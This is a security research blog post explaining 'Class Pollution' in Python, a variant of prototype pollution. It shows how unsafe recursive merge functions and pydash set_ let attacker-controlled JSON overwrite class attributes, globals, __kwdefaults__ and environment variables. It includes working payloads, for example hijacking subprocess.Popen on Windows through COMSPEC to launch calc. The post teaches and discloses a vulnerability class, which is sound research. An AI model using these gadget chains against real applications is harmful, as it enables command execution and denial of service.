Abdulraheem Khaled (Abdulrah33m)
> TL;DR
The main objective of this research is to prove the possibility of having a variation of Prototype Pollution in other programming languages, including those that are class-based by showing Class Pollution in Python.
Warning: This is a topic that Iâm still working on, the post will be frequently updated with the new results. While Iâve found examples of the vulnerable merge function implemented in various open-source projects, I still havenât found a full exploit with an impact other than crashing the application.
> Background
Prototype Pollution might be one of the coolest vulnerabilities to dig into as a researcher, researchers have been doing a great job to explore this topic further but thereâs always more. While reading about Prototype Pollution, I noticed that all resources are talking about Prototype Pollution in JavaScript, whether itâs a client-side or NodeJS server-side application, and honestly speaking, there is a good explanation for that. Prototype Pollution is one of the vulnerabilities that are language-specific as it should be affecting prototype-based programming languages only as the name suggests. While JavaScript is not the only programming language that is prototype-based, JavaScript is one of the most popular programming languages among them, therefore youâll see that all resources are talking about Prototype Pollution in JS. It might be possible to see Prototype Pollution in other prototype-based languages, however, we cannot say that a programming language is vulnerable just because it uses prototypes.
As a Python fanboy (yes, I admit it), I believe that you can build anything in Python, even vulnerabilities (as if Prototype Pollution in JavaScript were not complicated enough!).
> No Prototypes, No Issue
Letâs start by explaining what does Prototype
mean and why itâs being used. JavaScript uses prototype-based inheritance model, though the name might sound weird, the idea is similar to the normal class-based inheritance with some differences (itâs just that JavaScript wants to make our lives harder easier).
Prototypes are the mechanism by which JavaScript objects inherit features from one another.When you try to access a property of an object: if the property canât be found in the object itself, the prototype is searched for the property. If the property still canât be found, then the prototypeâs prototype is searched, and so on until either the property is found, or the end of the chain is reached, in which caseundefined
is returned.https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Objects/Object_prototypes
After we knew what a Prototype is, letâs know a little bit more about Prototype Pollution. There are a lot of awesome resources explaining Prototype Pollution in JavaScript much in-depth, I suggest that you check them first before continuing to read.
Prototype pollution is a vulnerability where an attacker is able to modifyObject.prototype
. Because nearly all objects in JavaScript are instances ofObject
, a typical object inherits properties (including methods) fromObject.prototype
. ChangingObject.prototype
can result in a wide range of issues, sometimes even resulting in remote code execution. https://www.acunetix.com/vulnerabilities/web/prototype-pollution/
I love to see Prototype Pollution as a fancy exploitation of object injection vulnerability (where we inject into an object not injecting a new object), instead of setting an attribute for that single object only, we can pollute the parent prototype which will be reflected on all other objects that otherwise would be inaccessible. While it may have a lot in common with insecure deserialization, try not to confuse them together.
The flexibility being offered by some of the scripting languages such as Python makes the differences between prototype-based and class-based inheritance models unnoticeable in action. Therefore, we might be able to replicate the idea of Prototype Pollution in other programming languages, even those using class-based inheritance. Iâll be referring to this vulnerability as Class Pollution in this article since we donât actually have prototypes in Python. Imagine saying we have found an SQL injection in a static web app that doesnât even have a database!
Dunder methods (also known as magic methods) are special methods that are implicitly invoked by all objects in Python during various operations, such as __str__()
, __eq__()
, and __call__()
.
They are used to specify what objects of a class should do when used in various statements and with various operators. Dunder methods have their own default implementation for built-in classes, which we will be implicitly inheriting from when creating a new class, however, developers can override these methods and provide their own implementation when defining new classes.
There are also other special attributes in every object in Python, such as __class__
, __doc__
, etc, each of these attributes is used for a specific purpose.
In Python, we donât have Prototypes but we have special attributes.
In Python itâs possible to update objects of mutable types to define or overwrite their attributes and methods at runtime. Letâs see it in action.
class Employee: pass # Creating an empty class
emp = Employee()
another_emp = Employee()
Employee.name = 'No one' # Defining an attribute for the Employee class
print(emp.name)
emp.name = 'Employee 1' # Defining an attribute for an object (overriding the class attribute)
print(emp.name)
emp.say_hi = lambda: 'Hi there!' # Defining a method for an object
print(emp.say_hi())
Employee.say_bye = lambda s: 'Bye!' # Defining a method for the Employee class
print(emp.say_bye())
Employee.say_bye = lambda s: 'Bye bye!' # Overwriting a method of the Employee class
print(another_emp.say_bye())
#> No one
#> Employee 1
#> Hi there!
#> Bye!
#> Bye bye!
In the code shown above, we created an instance of Employee
class, which is an empty class, and then defined a new attribute and method for that object. Attributes and methods can be defined on a specific object to be accessible by that instance only (non-static) or defined on a class so that all objects of that class can access it (static).
This feature in Python got me wondering why we canât apply the same concept of Prototype Pollution but this time in Python by leveraging the special attributes that all objects have.
From an attackerâs perspective, we are interested more in attributes that we can override/overwrite to be able to exploit this vulnerability rather than the magic methods. As our input will always be treated as data (str, int, etc..) and not actual code to be evaluated. Therefore, if we try to overwrite any of the magic methods, it will lead to crashing the application when trying to invoke that method, as data such as strings canât be executed. For example, trying to call __str__()
method after setting its value to a string would throw an error like this TypeError: 'str' object is not callable
.
Now letâs try to overwrite one of the most important attributes of any object in Python, which is __class__
, the attribute points to the class that the object is an instance of.
class Employee: pass # Creating an empty class
emp = Employee()
emp.__class__ = 'Polluted'
#> Traceback (most recent call last):
#> File "<stdin>", line 1, in <module>
#> TypeError: __class__ must be set to a class, not 'str' object
In our example, emp.__class__
points to Employee
class because itâs an instance of that class. You can think about <instance>.__class__
in Python as <instance>.constructor
in JavaScript.
So letâs try to set __class__
attribute of emp
object to a string for example and see what happens.
Even though we got an error, the error looks promising! It shows that __class__
must be set to another class and not a string. This means that it was trying to overwrite that special attribute with what we provided, the only issue is the datatype of the value we are trying to set __class__
to.
Letâs try to set another attribute that accepts strings, __qualname__
attribute that is inside __class__
might be good for testing.
__class__.__qualname__
is an attribute that contains the class name.
class Employee: pass # Creating an empty class
emp = Employee()
emp.__class__.__qualname__ = 'Polluted'
print(emp)
print(Employee)
#> <__main__.Polluted object at 0x0000024765C48250>
#> <class '__main__.Polluted'>
We were able to pollute the class and set __qualname__
attribute to an arbitrary string. Keep in mind that when we set __class__.__qualname__
on an object of a class, __qualname__
attribute of that class (which is Employee
in our case) has been changed, this is because __class__
is a reference to the class of that object and any modification on it will actually be applied to the class as we mentioned before.
To see how the vulnerability might exist in real Python applications, Iâve ported the recursive merge function thatâs being abused to pollute objectsâ prototype in the normal Prototype Pollution that we know.
The recursive merge function can exist in various ways and implementations and might be used to accomplish different tasks, such as merging two or more objects, using JSON to set an objectâs attributes, etc. The key functionality to look for is a function that gets untrusted input that we control and use it to set attributes of an object recursively. Finding such a function would be enough for exploiting the vulnerability, however, If we were lucky enough to find a merge function that not only allows us to recursively traverse and set attributes (__getattr__
and __setattr__
) of an object but also allows us to recursively traverse and set items (__getitem__
and __setitem__
), this makes it easier to find great gadgets to leverage.
On the other hand, a merge function that uses the input we control to recursively set items of a dictionary via __getitem__
and __setitem__
only would not be exploitable as we wonât be able to access special attributes such __class__
, __base__
, etc.
In JavaScript, this may not be noticed because an object is just a dictionary in JS and <object>[<property>]
and <object>.<property>
can be used to access attributes/items.
class Employee: pass # Creating an empty class
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
emp_info = {
"name":"Ahemd",
"age": 23,
"manager":{
"name":"Sarah"
}
}
emp = Employee()
print(vars(emp))
merge(emp_info, emp)
print(vars(emp))
print(f'Name: {emp.name}, age: {emp.age}, manager name: {emp.manager.get("name")}')
#> {}
#> {'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
#> Name: Ahemd, age: 23, manager name: Sarah
In the code above, we have a merge function that takes an instance emp
of the empty Employee
class and employeeâs info emp_info
which is a dictionary (similar to JSON) that we control as an attacker. The merge function will read keys and values from the emp_info
dictionary and set them on the given object emp
. In the end, what was previously an empty instance should have the attributes and items that we gave in the dictionary.
Letâs try to overwrite some special attributes now! We will be updating emp_info
to try to set __qualname__
attribute of Employee
class via emp.__class__.__qualname__
as we did before, but using the merge function this time.
class Employee: pass # Creating an empty class
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
emp_info = {
"name":"Ahemd",
"age": 23,
"manager":{
"name":"Sarah"
},
"__class__":{
"__qualname__":"Polluted"
}
}
emp = Employee()
merge(emp_info, emp)
print(vars(emp))
print(emp)
print(emp.__class__.__qualname__)
print(Employee)
print(Employee.__qualname__)
#> {'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
#> <__main__.Polluted object at 0x000001F80B20F5D0>
#> Polluted
#> <class '__main__.Polluted'>
#> Polluted
We were able to pollute the Employee
class, because an instance of that class is passed to the merge function, but what if we want to pollute the parent class as well? This is when __base__
comes into play, __base__
is another attribute of a class that points to the nearest parent class that itâs inheriting from, so if there is an inheritance chain, __base__
will point to the last class that we inherit.
In the example shown below, hr_emp.__class__
points to the HR
class, while hr_emp.__class__.__base__
points to the parent class of HR
class which is Employee
which we will be polluting.
class Employee: pass # Creating an empty class
class HR(Employee): pass # Class inherits from Employee class
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
emp_info = {
"__class__":{
"__base__":{
"__qualname__":"Polluted"
}
}
}
hr_emp = HR()
merge(emp_info, hr_emp)
print(HR)
print(Employee)
#> <class '__main__.HR'>
#> <class '__main__.Polluted'>
The same approach can be followed if we want to pollute any parent class (that isnât one of the immutable types) in the inheritance chain, by chaining __base__
together such as __base__.__base__
, __base__.__base__.__base__
and so on.
Now you might be wondering why donât we pollute the well-known object
class, that is the parent class of all classes at the end of the inheritance chain, and modifying any of its attributes would be reflected on all other objects.
If we tried to set an attribute of object
class such as object.__qualname__ = 'Polluted'
for example, we will get an error message TypeError: cannot set '__qualname__' attribute of immutable type 'object'
.
This is due to some limitations that Python has, as it doesnât allow us to modify classes of immutable types, such as object
, str
, int
, dict
, etc.
With this limitation that we have, in order to exploit Class Pollution in Python, the unsafe merge and the attribute that we want to set in order to leverage a gadget must be in the same class or at least share the same parent class (other than the object
class) at any point in the inheritance chain (not really, wait for it).
from os import popen
class Employee: pass # Creating an empty class
class HR(Employee): pass # Class inherits from Employee class
class Recruiter(HR): pass # Class inherits from HR class
class SystemAdmin(Employee): # Class inherits from Employee class
def execute_command(self):
command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
emp_info = {
"__class__":{
"__base__":{
"__base__":{
"custom_command": "whoami"
}
}
}
}
recruiter_emp = Recruiter()
system_admin_emp = SystemAdmin()
print(system_admin_emp.execute_command())
merge(emp_info, recruiter_emp)
print(system_admin_emp.execute_command())
#> [!] Executing: "echo Hello there", output: "Hello there"
#> [!] Executing: "whoami", output: "abdulrah33m"
In the previous example, even though the unsafe merge happens on an object of Recruiter
class and the gadget or the function that we are interested in (execute_command
function that allows command execution) is in SystemAdmin
class, we were able to take control of it by setting the custom_command
attribute Employee
class.
This is doable because SystemAdmin
and Recruiter
inherit from Employee
class at some point. By leveraging the unsafe merge we were able to set custom_command
attribute of Employee
class, so that when an instance of SystemAdmin
class looks for that attribute it will find it, as itâs inherited from the parent class Employee
.
It doesnât matter whether the instance of Recruiter
class was created before or after the merge operation since weâre polluting the class itself, which will be reflected on the existing instance and new instances of that class as well. Itâs only that the gadget must be invoked after polluting the class.
Thatâs interesting but hold up, there is even more. Till now we were able to pollute attributes of the instance passed to the merge function and its mutable parent classes only, but this is not everything.
In this variation of Prototype Pollution, we may not be able to pollute the built-in object class but we can pollute all other mutable classes that we want if we can find a chain of attributes that leads to that class. Not only this, in fact, weâre not limited to classes and their attributes, by leveraging __globals__
attribute we can overwrite even variables in the code.
Based on Python documentation __globals__
is âA reference to the dictionary that holds the functionâs global variables â the global namespace of the module in which the function was defined.â In other words, __globals__
is a dictionary object that gives us access to the global scope of a function which allows us to access defined variables, imported modules, etc. To access items of __globals__
attribute the merge function must be using __getitem__
as previously mentioned.
__globals__
attribute is accessible from any of the defined methods of the instance we control, such as __init__
. We donât have to use __init__
in specific, we can use any defined method of that instance to access __globals__
, however, most probably we will find __init__
method on every class since this is the class constructor. We cannot use built-in methods inherited from the object
class, such as __str__
unless they were overridden. Keep in mind that <instance>.__init__
, <instance>.__class__.__init__
and <class>.__init__
are all the same and point to the same class constructor.
So the rule of thumb here is that if we were able to find a chain of attributes/items (based on the merge function) from the object that we control to any attribute or a variable that we want to control, then we will be able to overwrite it.
This gives us much more flexibility and exponentially increases the attack surface when looking for gadgets to leverage. We will be showing some examples of gadgets that you may leverage based on the application.
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class User:
def __init__(self):
pass
class NotAccessibleClass: pass
not_accessible_variable = 'Hello'
merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Polluted variable','NotAccessibleClass':{'__qualname__':'PollutedClass'}}}}}, User())
print(not_accessible_variable)
print(NotAccessibleClass)
#> Polluted variable
#> <class '__main__.PollutedClass'>
We leveraged the special attribute __globals__
to access and set an attribute of NotAccessibleClass
class, and modify the global variable not_accessible_variable
. NotAccessibleClass
and not_accessible_variable
wouldnât be accessible without __globals__
since the class isnât a parent class of the instance we control and the variable isnât an attribute of the class we control. However, since we can find a chain of attributes/items to access it from the instance we have, we were able to pollute NotAccessibleClass
and not_accessible_variable
.
> Real Examples of the Merge Function
Letâs look for actual examples of the merge function implementation.
While I was working on this topic, I wanted to show real cases for libraries or applications that are vulnerable to Class Pollution to prove the concept. So, I started by doing some random searches about Python libraries providing functionality where recursive merge might be needed and used.
Lodash is one of the JavaScript libraries where Prototype Pollution was previously discovered and reported more than once. Now allow me to introduce you to the Python implementation of Lodash which is Pydash. Pydash set_
and set_with
functions are examples of recursive merge functions that we can leverage to pollute attributes.
The best thing is that both set_ and set_with allow us to move between objectâs attributes and items in dictionaries and setting them which is the best thing that we could ask for. By passing the object, the path of the attribute/item we want to set, and the value to be set to, each of these functions can be used to set the specified attribute or item on the given instance.
In all the previous examples, the Pydash set_
and set_with
functions can be used instead of the merge function that we have written and it will still be exploitable in the same way. The only difference is that Pydash functions use dot notation such as ((<attribute>|<item>).)*(<attribute>|<item>)
to access attributes and items instead of the JSON format.
import pydash
class User:
def __init__(self):
pass
class NotAccessibleClass: pass
not_accessible_variable = 'Hello'
pydash.set_(User(), '__class__.__init__.__globals__.not_accessible_variable','Polluted variable')
print(not_accessible_variable)
pydash.set_(User(), '__class__.__init__.__globals__.NotAccessibleClass.__qualname__','PollutedClass')
print(NotAccessibleClass)
#> Polluted variable
#> <class '__main__.PollutedClass'>
> Some Cool Gadgets
As always in Prototype Pollution, the impact depends on the application and the available gadgets to be leveraged, here also the impact ranges between causing DoS by crashing the application and ultimately achieving command execution, it all depends on the application itself. While we canât list all the gadgets that you may find, in this section Iâll try to show some of the cool gadgets that you might come across while exploiting this vulnerability.
subprocess.Popen on Windows
In this example, we can set any attribute or item under the newly created instance of Employee
class, by providing the JSON formatted payload as previously shown. After performing the merge operation, the script executes the hard-coded whoami
command. Our objective here is to hijack the execution of Popen
to execute arbitrary commands instead of the whoami
command.
Take some time and try to pop calc.exe
on your own before you continue reading, this exploit works on Windows only.
import subprocess, json
class Employee:
def __init__(self):
pass
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
emp_info = json.loads('{"name": "employee"}') # attacker-controlled value
merge(emp_info, Employee())
subprocess.Popen('whoami', shell=True)
Our main objective here is to find a chain of attributes and items that somehow allows us to control the command executed by Popen
(is class and not a function).
By looking into the subprocess
module source code to see how Popen
works on Windows.
if shell:
startupinfo.dwFlags |= _winapi.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = _winapi.SW_HIDE
comspec = os.environ.get("COMSPEC", "cmd.exe")
args = '{} /c "{}"'.format (comspec, args)
We notice that thereâs an if statement that checks if the shell
argument was set to True
or not, if it was set to True
, it tries to get the path of cmd.exe
from the userâs environment variables to execute the provided command using C:\WINDOWS\system32\cmd.exe /c <command>
. If the environment variable COMSPEC
is not defined then it sets comspec
variable in the code (not the environment variable) to cmd.exe
. So if we control the value of COMSPEC
in os.environ
, we will be able to inject arbitrary commands.
The chain that we need to use to overwrite COMSPEC
environment variable can be explained as follows:
- We will start by accessing any method ofÂ
Employee
 instance other than the built-in methods to be able to access  attribute, which isÂ__init__
 in our case. - UsingÂ
__globals__
 we will be able to access thesubprocess
  module that is imported in our script. - On the first lines ofÂ
subprocess
 module, we can see that it imports theÂos
 module which we need to access to get toÂenviron
. If theÂos
 module was already imported in our script, we would be able to access it directly usingÂ__init__.__globals__.os
 without needing to useÂsubprocess
. - Finally, after getting to
os
 module we can overwrite the value ofÂCOMSPEC
 insideÂenviron
 to perform command injection.
import subprocess, json
class Employee:
def __init__(self):
pass
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
emp_info = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
merge(emp_info, Employee())
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
Overwriting Functionâs __kwdefaults__
__kwdefaults__
is a special attribute of all functions, based on Python documentation, it is a âmapping of any default values for keyword-only parametersâ. Polluting this attribute allows us to control the default values of keyword-only parameters of a function, these are the functionâs parameters that come after *
or *args
.
import json
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class Employee:
def __init__(self):
pass
def print_message(*, message='Hello there'):
print(message)
print(print_message.__kwdefaults__)
print_message()
emp_info = json.loads('{"__class__":{"__init__":{"__globals__":{"print_message":{"__kwdefaults__":{"message":"Polluted default value"}}}}}}') # attacker-controlled value
merge(emp_info, Employee())
print(print_message.__kwdefaults__)
print_message()
#> {'message': 'Hello there'}
#> Hello there
#> {'message': 'Polluted default value'}
#> Polluted default value
While __kwdefaults__
stores default values for keyword-only parameters, __defaults__
attribute is a tuple that stores default values for positional-or-keyword parameters. It would be great if we can pollute __defaults__
attribute of a function, however, this wonât be possible in scenarios where the untrusted input that we control is parsed as JSON because JSON format does not have tuples ()
.
There is More
Since it wonât be possible to list all the possible ways to leverage this vulnerability, Iâll mention a few more examples and leave it for the readers to explore them further.
- Overwriting Flask web app secret key thatâs used for session signing.
- Path hijacking viaÂ
os.environ
.
> Updates
Since this is a topic that Iâm still working on, Iâm going to update this blog during my journey to answer questions that we all have.
- January 4, 2023: the article was published.
> References
- https://portswigger.net/daily-swig/prototype-pollution-the-dangerous-and-underrated-vulnerability-impacting-javascript-applications
- https://developer.mozilla.org/en-US/docs/Web/JavaScript/Inheritance_and_the_prototype_chain
- https://alistapart.com/article/prototypal-object-oriented-programming-using-javascript/
- https://github.com/HoLyVieR/prototype-pollution-nsec18